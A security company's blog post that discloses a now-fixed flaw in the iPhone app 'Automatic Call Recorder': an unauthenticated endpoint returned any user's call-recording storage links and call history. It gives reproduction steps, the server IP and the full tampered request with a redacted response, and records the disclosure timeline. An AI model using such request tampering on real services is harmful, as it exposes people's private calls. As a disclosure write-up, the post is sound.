Learn more
How we could have listened to anyone's call recordings.
Security Research

How we could have listened to anyone's call recordings.

The vulnerability allowed any malicious actor to listen to any user's call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim's data.

Anand Prakash
March 30, 2021

Note:

This vulnerability was responsibly disclosed by Anand Prakash, PingSafe AI and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.
"Automatic call recorder" application is one of the popular application used by iPhone users to record their calls.
The app is among top grossing in the Business category of App Store currently #15 in the downloads in the Business Category worldwide.

Summary:
Anand with the help of PingSafe AI's threat intelligence product discovered this vulnerability while doing open source intelligence across mobile applications in different categories. PingSafe AI decompiled the IPA file and figured out S3 buckets, host names and other sensitive details used by the application.
The vulnerability allowed any malicious actor to listen to any user's call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim's data.

Vulnerability Details:
This vulnerability existed in the "/fetch-sinch-recordings.php" API endpoint of the "Automatic Call Recorder" application. An attacker can pass another user's number in the recordings request and the API will respond with recording url of the storage bucket without any authentication. It also leaks victim's entire call history and the numbers on which calls were made.

Steps to Reproduce:
1) Install "Automatic Call Recorder" application in your phone.
2) Intercept application's traffic in Burp Suite/Zap Proxy.
3) You will observe a POST API request to 167.88.123.157:80/fetch-sinch-recordings.php change UserID to victim's phone number with country code.

4) Response will have s3 url for the recording and other sensitive details.


Vulnerable Request:

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
 "UserID": "xxxxxx",
 "AppID": "xxx"
}

Response:


HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/json

[
 {
   "start_time": "1604681",
   "start_time_iso": "2019-10-01T17:58:54+0100",
   "caller_number": "xxxxxxx",
   "callee": "+xxxxxxxxx",
   "marked_as_deleted": "0",
   "user_id": "xxxxxxxxxx",
   "sinch_app_id": "xxxxxxxxxxxx",
   "call_id": "xxxxxxx",
   "s3_key": "call_recordings/1011101/xyzrecording.wav"
 }
]




Timelines:
Feb 27th, 2021 09:20 PM IST - Vulnerability discovered by Anand Prakash from PingSafe AI
Feb 27th, 2021 10:34 PM IST-  The company did not have any responsible disclosure program. Reached out to Zack Whittaker for help in the responsible disclosure. Issue forwarded to the developer.
March 6th, 2021 1:16 AM IST - Confirmation from TechCrunch that the new build will get published anytime soon by the developer.
March 6th, 2021 08:52 PM IST - Bug is fixed and new version is made live on App Store.

Security issues like this are catastrophic in nature. Along with impacting customer's privacy, these also dents the company's image and provides added advantage to the competitors.
PingSafe AI uses the state of the art intelligent risk evaluation engine to monitors the security health of a company comprehensively by assessing all domains, IPs, mobile applications, sources codes and leaked credentials.

Follow us on LinkedIn and Twitter to get more details.

ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties” — large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook’s has ranked Anand as one of their top bounty hunters.And on Twitter’s bounty program, he’s ranked #3 world-wide. Anand’s reputation as a hacker has lead to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia. And a major Indian news website declared Anand “one of India’s best known white hat hackers.”‍

Enjoyed this read?

Stay up to date with the latest security research by PingSafe team.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.